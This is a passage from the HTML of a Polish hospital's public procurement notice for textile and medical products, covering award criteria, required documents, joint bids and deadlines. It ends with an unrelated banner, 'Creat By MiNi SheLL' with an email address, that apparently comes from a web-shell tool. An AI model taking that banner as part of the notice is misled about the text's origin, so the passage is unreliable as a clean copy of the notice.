0<br/><br/>Ocena polega na zbadaniu próbki pod katem w/w elementów : <br/>- brak uwag do wymienionych elementów 5 pkt. <br/>- jedna uwaga 3 punkty , <br/>- dwie i więcej uwag 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający odstępuje od żądania złożenia przez Wykonawcę podmiotowych środków dowodowych w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie określa warunków udziału w postępowaniu, tym samym nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. W celu potwierdzenia zgodności oferowanych dostaw z wymaganiami określonymi <br/>w opisie przedmiotu zamówienia, zamawiający wymaga złożenia wraz z ofertą:<br/>1.1 szczegółowy opis poszczególnych pozycji asortymentowych (folder handlowy wykonawcy w języku polskim) z zaznaczeniem, którego zadania i której pozycji dotyczy wraz z kartą techniczną tkaniny potwierdzającą gramaturę i skład,<br/>1.2 dokumentów potwierdzających, że przedmiot zamówienia posiada certyfikat CE wystawiony przez notyfikowaną jednostkę certyfikującą lub deklaracje zgodności wystawione przez producenta lub dokumenty równoważne - dotyczy zadania nr 1 <br/>poz. 10, oraz zadania nr 2,<br/>1.3 dokumentów wystawionych przez producenta tkaniny lub niezależną jednostkę badawczą potwierdzający wymagane parametry tj. gramaturę, skład, odporność <br/>na przesiąkanie cieczy, przepuszczalność pary wodnej oraz parametry wytrzymałościowe<br/>- dotyczy zadania nr 1 poz. 10,<br/>1.4 dokumentów potwierdzających, że przedmiot zamówienia został wpisany lub zgłoszony do Rejestru Wyrobów Medycznych - dotyczy zadania nr 1 poz. 10 oraz zadania nr 2<br/>1.5 dokumentów przedstawiających wyniki badań tkanin wykonane przez niezależną jednostkę badawcza, potwierdzające parametry techniczne zgodnie z normą PN-EN 13795 - dotyczy zadania nr 2 <br/>1.6 Instrukcja użytkowania w języku polskim.<br/><br/>1.7 Próbki w postaci 1 sztuki dla każdego z asortymentu będącego przedmiotem zamówienia w tym postępowaniu, zgodnie z załącznikiem nr 1a do SWZ.<br/><br/>a)	Zamawiający oświadcza, że celem złożenia próbki jest potwierdzenie zgodności oferowanego przez Wykonawcę przedmiotu zamówienia z jakościowym kryterium oceny ofert oraz potwierdzeniem dostarczania przedmiotu umowy przez cały okres obowiązywania umowy zgodnie z dostarczoną próbką.<br/>b) Zamawiający nie wymaga aby dostarczone próbki posiadały haft w postaci logo szpitala. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1 szczegółowy opis poszczególnych pozycji asortymentowych (folder handlowy wykonawcy w języku polskim) z zaznaczeniem, którego zadania i której pozycji dotyczy wraz z kartą techniczną tkaniny potwierdzającą gramaturę i skład,<br/>2 dokumentów potwierdzających, że przedmiot zamówienia posiada certyfikat CE wystawiony przez notyfikowaną jednostkę certyfikującą lub deklaracje zgodności wystawione przez producenta lub dokumenty równoważne - dotyczy zadania nr 1 <br/>poz. 10, oraz zadania nr 2,<br/>3 dokumentów wystawionych przez producenta tkaniny lub niezależną jednostkę badawczą potwierdzający wymagane parametry tj. gramaturę, skład, odporność <br/>na przesiąkanie cieczy, przepuszczalność pary wodnej oraz parametry wytrzymałościowe<br/>- dotyczy zadania nr 1 poz. 10,<br/>4 dokumentów potwierdzających, że przedmiot zamówienia został wpisany lub zgłoszony do Rejestru Wyrobów Medycznych - dotyczy zadania nr 1 poz. 10 oraz zadania nr 2<br/>5 dokumentów przedstawiających wyniki badań tkanin wykonane przez niezależną jednostkę badawcza, potwierdzające parametry techniczne zgodnie z normą PN-EN 13795 - dotyczy zadania nr 2 <br/>6 Instrukcja użytkowania w języku polskim. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I. Oferta oraz oświadczenia lub dokumenty składane razem z ofertą:<br/>	1)	oferta Wykonawcy – załącznik nr 1, 1a do SWZ<br/>	2)	dokumenty potwierdzające uprawnienie do podpisania oferty <br/>oraz do podpisania lub poświadczenia za zgodność z oryginałem składanych oświadczeń lub dokumentów. Jeżeli odrębne przepisy wymagają wpisu <br/>do rejestru lub ewidencji dokumentem właściwym w przypadku Wykonawców mających siedzibę na terenie Rzeczypospolitej Polskiej (RP) jest odpis lub informacja z Krajowego Rejestru Sadowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru lub dokumentu <br/>na podstawie których dokonuje się wpisu do właściwego rejestru lub ewidencji, np.: uchwała właściwego organu Wykonawcy. Wykonawca może wskazać dostępność w formie elektronicznej dokumentów pod określonymi, bezpłatnymi adresami internetowymi baz danych w formularzu oferty,<br/>	3) pełnomocnictwo<br/> 4) oświadczenie z art. 125 ust. 1 Pzp – wzór stanowi załącznik nr 2 do SWZ<br/> 5) przedmiotowe środki dowodowe określone w pkt 10 SWZ oraz w postaci próbki – składane zgodnie z zapisami pkt 13 SWZ.<br/><br/>II. Dokumenty składane przez wykonawcę na wezwanie Zamawiającego <br/>w trybie art. 274 ust 1 Pzp, w terminie nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień ich złożenia:<br/>1)	podmiotowe środki dowodowe oraz oświadczenia na potwierdzenie spełnienia warunków udziału w postępowaniu zgodnie z pkt. 5.2 SWZ.<br/><br/>III INFORMACJE O FORMALNOŚCIACH JAKIE POWINNY ZOSTAĆ DOPEŁNIONE PO WYBORZE OFERTY W CELU<br/>ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO.<br/> Wykonawca przedłoży oświadczenie w związku z ogólnounijnym zakazem udziału rosyjskich wykonawców w zamówieniach publicznych, wzór stanowi załącznik nr 3 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W/w Wykonawcy zobowiązani są do ustanowienia Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne pełnomocnictwo o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki nie wynika z dołączonej do oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie <br/>z pełnomocnikiem.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 Pzp składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to musi potwierdzać brak podstaw wykluczenia.<br/>5. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>6.	Wykonawcy, wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy. <br/>7. Oświadczenia składane przez wykonawców przekazywane są w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Warunki zmiany postanowień zawartej umowy określono w części IV SWZ tj. w §10 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-25 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szpital.zabrze</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-25 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1.	Cena 60%<br/>2.	Termin dostawy – 20%<br/>3.	Jakość – 20% <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Ze względu na ograniczoną liczbę znaków jakie można wprowadzić w niniejszym ogłoszeniu Zamawiający przypomina, iż pełną informację w zakresie niniejszego postępowania można uzyskać pod adresem www.platformazakupowa.pl, w tym w dokumentach postępowania, m.in. SWZ wraz z załącznikami.<br/>2. W toku postępowania o udzielenie zamówienia publicznego Wykonawcy przysługują środki ochrony prawnej przewidziane w Dziale IX ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych ( tj. Dz.U. z 2023 r. poz. 1605).<br/>3. Wykonawca zagraniczny:<br/>3.1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast<br/>dokumentów o których mowa w pkt 16.3.1.2) – składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca<br/>ma siedzibę lub miejsce zamieszania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument<br/>wskazujące sposób reprezentacji Wykonawcy oraz osoby uprawnione do reprezentowania Wykonawcy.<br/>3.2. Dokument, o którym mowa w pkt 3.1. powinien być wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem.<br/>4. Zamawiający przewiduje wykluczenie z postępowania o udzielenie zamówienia prowadzonego na podstawie ustawy Pzp, na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2023, poz. 1497).

Creat By MiNi SheLL
Email: jattceo@gmail.com